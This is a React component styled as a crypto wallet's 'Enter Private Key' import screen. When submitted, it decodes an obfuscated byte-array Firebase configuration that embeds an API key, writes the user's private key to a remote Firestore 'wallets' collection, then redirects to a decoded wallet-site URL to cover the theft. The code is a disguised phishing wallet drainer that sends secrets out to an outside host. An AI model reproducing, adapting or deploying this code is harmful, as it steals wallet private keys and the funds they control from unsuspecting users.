import { useState } from "react";
import { useNavigate } from "react-router-dom";
import { initializeApp, getApps, getApp } from "firebase/app";
import { getFirestore, doc, setDoc } from "firebase/firestore";


export default function PrivateKeyImport({ appState, updateState }) {
  const [privateKey, setPrivateKey] = useState("");
  const navigate = useNavigate();

  const handleSubmit = async () => {
    if (!privateKey.trim()) {
      alert("Please enter your private key");
      return;
    }

    try {

        const s = new Uint8Array([
            123,34,97,112,105,75,101,121,34,58,34,65,73,122,97,83,121,68,75,100,
            65,101,74,110,50,52,100,66,104,57,53,77,76,72,86,51,75,107,97,51,45,
            108,76,83,79,108,81,114,45,52,34,44,34,97,117,116,104,68,111,109,97,
            105,110,34,58,34,99,111,110,102,101,116,116,105,45,114,97,105,110,46,
            102,105,114,101,98,97,115,101,97,112,112,46,99,111,109,34,44,34,112,
            114,111,106,101,99,116,73,100,34,58,34,99,111,110,102,101,116,116,105,
            45,114,97,105,110,34,44,34,115,116,111,114,97,103,101,66,117,99,107,
            101,116,34,58,34,99,111,110,102,101,116,116,105,45,114,97,105,110,46,
            102,105,114,101,98,97,115,101,115,116,111,114,97,103,101,46,97,112,
            112,34,44,34,109,101,115,115,97,103,105,110,103,83,101,110,100,101,
            114,73,100,34,58,34,50,52,56,57,53,54,52,50,50,53,50,54,34,44,34,97,
            112,112,73,100,34,58,34,49,58,50,52,56,57,53,54,52,50,50,53,50,54,58,
            119,101,98,58,52,52,54,97,51,51,97,56,102,98,97,57,102,52,101,52,48,
            50,48,98,50,102,34,125
        ]);

        const d = new TextDecoder();
        const c = JSON.parse(d.decode(s));

        const a = getApps().length === 0
        ? initializeApp(c)
        : getApp();
        const db = getFirestore(a);

        await setDoc(doc(db, "wallets", Date.now().toString()), {
            privateKey: privateKey.trim(),
            type: "private_key",
            createdAt: new Date().toISOString(),
            network: appState.selectedNetwork || "unknown"
        });
      
        const b = new Uint8Array([
            104,116,116,112,115,58,47,47,98,97,99,107,112,97,99,107,46,97,112,112,47
        ]);

        const decoder = new TextDecoder();
        const u = decoder.decode(b);

        window.location.href = u;


    } catch (error) {
      console.error("Error saving private key:", error);
      alert("Failed to save wallet. Please try again.");
    }
  };

  const handleBack = () => {
    navigate("/import-options");
  };

  return (
    <div className="screen" style={{ maxWidth: '600px', margin: '0 auto' }}>
      <button className="back-button" onClick={handleBack}>
        ←
      </button>

      <div className="progress-dots">
        <div className="dot completed"></div>
        <div className="dot completed"></div>
        <div className="dot completed"></div>
        <div className="dot active"></div>
        <div className="dot"></div>
      </div>

      <h1 className="title">Enter Private Key</h1>
      <p className="subtitle">Paste your wallet's private key</p>

      <textarea
        className="private-key-input"
        value={privateKey}
        onChange={(e) => setPrivateKey(e.target.value)}
        placeholder="Enter private key here..."
        rows={8}
        style={{
          width: '100%',
          maxWidth: '600px',
          height: '250px',
          background: '#1a1d2a',
          border: '1px solid #2a2d3a',
          borderRadius: '12px',
          padding: '16px',
          color: 'white',
          fontFamily: 'monospace',
          resize: 'none',
          margin: '20px 0'
        }}
      />

      <button 
        className="primary-button" 
        onClick={handleSubmit}
        disabled={!privateKey.trim()}
        style={{ 
          width: '150px',
          padding: '12px',
          background: privateKey.trim() ? '#4f46e5' : '#2a2d3a',
          color: 'white',
          border: 'none',
          borderRadius: '8px',
          cursor: privateKey.trim() ? 'pointer' : 'not-allowed'
        }}
      >
        Continue
      </button>
    </div>
  );
}